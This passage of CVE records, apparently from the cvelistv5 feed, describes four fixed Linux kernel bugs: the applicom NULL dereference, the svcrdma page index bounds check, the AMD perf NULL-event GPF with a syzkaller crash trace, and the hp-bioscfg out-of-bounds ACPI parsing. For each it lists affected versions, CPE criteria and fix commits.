"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:09.470Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5a6240804fb7bbd4f5f6e706955248a6f4c1abbc"
},
{
"url": "https://git.kernel.org/stable/c/d1b0452280029d05a98c75631131ee61c0b0d084"
},
{
"url": "https://git.kernel.org/stable/c/0b8b353e09888bccee405e0dd6feafb60360f478"
},
{
"url": "https://git.kernel.org/stable/c/d285517429a75423789e6408653e57b6fdfc8e54"
},
{
"url": "https://git.kernel.org/stable/c/74883565c621eec6cd2e35fe6d27454cf2810c23"
},
{
"url": "https://git.kernel.org/stable/c/f83e3e9f89181b42f6076a115d767a7552c4a39e"
},
{
"url": "https://git.kernel.org/stable/c/82d12088c297fa1cef670e1718b3d24f414c23f7"
}
],
"title": "char: applicom: fix NULL pointer dereference in ac_ioctl",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68797",
"datePublished": "2026-01-13T15:29:07.575Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-19T12:19:09.470Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71068 (GCVE-0-2025-71068)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
Title
svcrdma: bound check rq_pages index in inline path
Summary
In the Linux kernel, the following vulnerability has been resolved:
svcrdma: bound check rq_pages index in inline path
svc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without
verifying rc_curpage stays within the allocated page array. Add guards
before the first use and after advancing to a new page.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9 (git) |
| Linux | Linux | Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < 7ba826aae1d43212f3baa53a2175ad949e21926e (git) |
| Linux | Linux | Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < 5f140b525180c628db8fa6c897f138194a2de417 (git) |
| Linux | Linux | Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < da1ccfc4c452541584a4eae89e337cfa21be6d5a (git) |
| Linux | Linux | Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < d1bea0ce35b6095544ee82bb54156fc62c067e58 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "7ba826aae1d43212f3baa53a2175ad949e21926e",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "5f140b525180c628db8fa6c897f138194a2de417",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "da1ccfc4c452541584a4eae89e337cfa21be6d5a",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "d1bea0ce35b6095544ee82bb54156fc62c067e58",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "5.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: bound check rq_pages index in inline path\n\nsvc_rdma_copy_inline_range indexed rqstp-\u003erq_pages[rc_curpage] without\nverifying rc_curpage stays within the allocated page array. Add guards\nbefore the first use and after advancing to a new page."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:29.814Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9"
},
{
"url": "https://git.kernel.org/stable/c/7ba826aae1d43212f3baa53a2175ad949e21926e"
},
{
"url": "https://git.kernel.org/stable/c/5f140b525180c628db8fa6c897f138194a2de417"
},
{
"url": "https://git.kernel.org/stable/c/da1ccfc4c452541584a4eae89e337cfa21be6d5a"
},
{
"url": "https://git.kernel.org/stable/c/d1bea0ce35b6095544ee82bb54156fc62c067e58"
}
],
"title": "svcrdma: bound check rq_pages index in inline path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71068",
"datePublished": "2026-01-13T15:31:23.283Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-19T12:19:29.814Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68798 (GCVE-0-2025-68798)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
Title
perf/x86/amd: Check event before enable to avoid GPF
Summary
In the Linux kernel, the following vulnerability has been resolved:
perf/x86/amd: Check event before enable to avoid GPF
On AMD machines cpuc->events[idx] can become NULL in a subtle race
condition with NMI->throttle->x86_pmu_stop().
Check event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.
This appears to be an AMD only issue.
Syzkaller reported a GPF in amd_pmu_enable_all.
INFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143
msecs
Oops: general protection fault, probably for non-canonical address
0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]
CPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk
RIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195
arch/x86/events/core.c:1430)
RSP: 0018:ffff888118009d60 EFLAGS: 00010012
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002
R13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601
FS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0
Call Trace:
<IRQ>
amd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))
x86_pmu_enable (arch/x86/events/core.c:1360)
event_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186
kernel/events/core.c:2346)
__perf_remove_from_context (kernel/events/core.c:2435)
event_function (kernel/events/core.c:259)
remote_function (kernel/events/core.c:92 (discriminator 1)
kernel/events/core.c:72 (discriminator 1))
__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27
./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64
kernel/smp.c:135 kernel/smp.c:540)
__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27
./include/linux/jump_label.h:207
./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)
sysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)
arch/x86/kernel/smp.c:266 (discriminator 47))
</IRQ>
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 49324a0c40f7e9bae1bd0362d23fc42232e14621 (git) |
| Linux | Linux | Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f (git) |
| Linux | Linux | Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < e1028fb38b328084bc683a4efb001c95d3108573 (git) |
| Linux | Linux | Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 43c2e5c2acaae50e99d1c20a5a46e367c442fb3b (git) |
| Linux | Linux | Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 866cf36bfee4fba6a492d2dcc5133f857e3446b0 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/events/amd/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "49324a0c40f7e9bae1bd0362d23fc42232e14621",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "e1028fb38b328084bc683a4efb001c95d3108573",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "43c2e5c2acaae50e99d1c20a5a46e367c442fb3b",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "866cf36bfee4fba6a492d2dcc5133f857e3446b0",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/events/amd/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.19"
},
{
"lessThan": "5.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:36.755Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/49324a0c40f7e9bae1bd0362d23fc42232e14621"
},
{
"url": "https://git.kernel.org/stable/c/6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f"
},
{
"url": "https://git.kernel.org/stable/c/e1028fb38b328084bc683a4efb001c95d3108573"
},
{
"url": "https://git.kernel.org/stable/c/43c2e5c2acaae50e99d1c20a5a46e367c442fb3b"
},
{
"url": "https://git.kernel.org/stable/c/866cf36bfee4fba6a492d2dcc5133f857e3446b0"
}
],
"title": "perf/x86/amd: Check event before enable to avoid GPF",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68798",
"datePublished": "2026-01-13T15:29:08.329Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-14T08:51:36.755Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71101 (GCVE-0-2025-71101)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing
Summary
In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing
The hp_populate_*_elements_from_package() functions in the hp-bioscfg
driver contain out-of-bounds array access vulnerabilities.
These functions parse ACPI packages into internal data structures using
a for loop with index variable 'elem' that iterates through
enum_obj/integer_obj/order_obj/password_obj/string_obj arrays.
When processing multi-element fields like PREREQUISITES and
ENUM_POSSIBLE_VALUES, these functions read multiple consecutive array
elements using expressions like 'enum_obj[elem + reqs]' and
'enum_obj[elem + pos_values]' within nested loops.
The bug is that the bounds check only validated elem, but did not consider
the additional offset when accessing elem + reqs or elem + pos_values.
The fix changes the bounds check to validate the actual accessed index.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < cf7ae870560b988247a4bbbe5399edd326632680 (git) |
| Linux | Linux | Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < db4c26adf7117b1a4431d1197ae7109fee3230ad (git) |
| Linux | Linux | Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < 79cab730dbaaac03b946c7f5681bd08c986e2abd (git) |
| Linux | Linux | Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < e44c42c830b7ab36e3a3a86321c619f24def5206 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/platform/x86/hp/hp-bioscfg/enum-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/int-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/order-list-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/passwdobj-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/string-attributes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cf7ae870560b988247a4bbbe5399edd326632680",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
},
{
"lessThan": "db4c26adf7117b1a4431d1197ae7109fee3230ad",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
},
{
"lessThan": "79cab730dbaaac03b946c7f5681bd08c986e2abd",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
},
{
"lessThan": "e44c42c830b7ab36e3a3a86321c619f24def5206",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/platform/x86/hp/hp-bioscfg/enum-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/int-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/order-list-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/passwdobj-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/string-attributes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:59.717Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cf7ae870560b988247a4bbbe5399edd326632680"
},
{
"url": "https://git.kernel.org/stable/c/db4c26adf7117b1a4431d1197ae7109fee3230ad"
},
{
"url": "https://git.kernel.org/stable/c/79cab730dbaaac03b946c7f5681bd08c986e2abd"
},
{
"url": "https://git.kernel.org/stable/c/e44c42c830b7ab36e3a3a86321c619f24def5206"
}
],
"title": "platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71101",
"datePublished": "2026-01-13T15:34:59.717Z",
"dateReserved": "2026-01-13T15:30:19.651Z",
"dateUpdated": "2026-01-13T15:34:59.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}